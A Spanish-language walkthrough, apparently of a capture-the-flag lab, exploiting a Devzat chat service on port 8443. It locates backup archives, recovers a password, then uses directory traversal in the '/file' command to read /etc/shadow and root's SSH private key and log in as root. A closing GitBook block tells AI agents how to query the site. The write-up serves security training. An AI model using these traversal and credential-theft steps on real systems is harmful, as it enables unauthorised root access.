> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/ports-and-services/devzat-8443.md).

# Devzat - 8443

### Puerto 8443 (Devzat - Producción)

El puerto 8443 expone una instancia de Devzat en producción. El `archivo` El parámetro puede listar archivos en el sistema como root, pero esta función está protegida por contraseña.

<figure><img src="/files/b0acaabf9c7c37f329cd7c2ffcbdb3c3d36e3910" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/403165c5f6acf0fa9082e7cac94f290aaa58edb2" alt=""><figcaption></figcaption></figure>

Intentando *catherine*La contraseña de 's falla. Busca archivos que *catherine* pueden leerse en el sistema.

<figure><img src="/files/a224d9ef5bfc062e7278f0ce3637a282a11ecde2" alt="" width="538"><figcaption></figcaption></figure>

### Busca archivos legibles por Catherine

Encuentra todos los archivos legibles por *catherine*:

```bash
find / -user catherine -readable 2>/dev/null | grep -vE "cgroup|proc"
```

Dos copias de seguridad `.zip` se encuentran archivos:

* `/var/backups/devzat-main.zip`
* `/var/backups/devzat-dev.zip`

Descarga el archivo de copia de seguridad `devzat-dev.zip` y filtra su contenido en busca de contraseñas. Se encuentra una contraseña útil: **`CeilingCatStillAThingIn2021?`**.

<figure><img src="/files/de9fc3634ddc831b4d71587d46293d98d5f3bf48" alt=""><figcaption></figcaption></figure>

Usa esta contraseña para acceder a `/etc/shadow` a través de la `archivo` parámetro:

```bash
/file /etc/shadows CeilingCatStillAThingIn2021?
```

Aunque la contraseña es correcta, **recorrido de directorios** es necesario para obtener acceso completo. Usa el recorrido para navegar por el sistema de archivos:

<figure><img src="/files/926ca695db275328d764cbbb8840d3811dbfb58d" alt=""><figcaption></figcaption></figure>

```bash
/file ../../../../etc/shadow CeilingCatStillAThingIn2021?
```

El `/etc/shadow` el archivo se muestra correctamente como root.

<figure><img src="/files/defe099312fe7ed59019392fde53af61474105ba" alt=""><figcaption></figcaption></figure>

### Acceso SSH como root

Usa un recorrido de directorios adicional para acceder a la clave SSH de root:

```bash
/file ../../../../root/.ssh/id_rsa CeilingCatStillAThingIn2021?
```

<figure><img src="/files/138219811aa8459e1f7ddce5c3fb3931656157bb" alt="" width="563"><figcaption></figcaption></figure>

Descarga la clave SSH e inicia sesión como root.

<figure><img src="/files/4422015570b295359995832bf815f24ed322c943" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/ports-and-services/devzat-8443.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
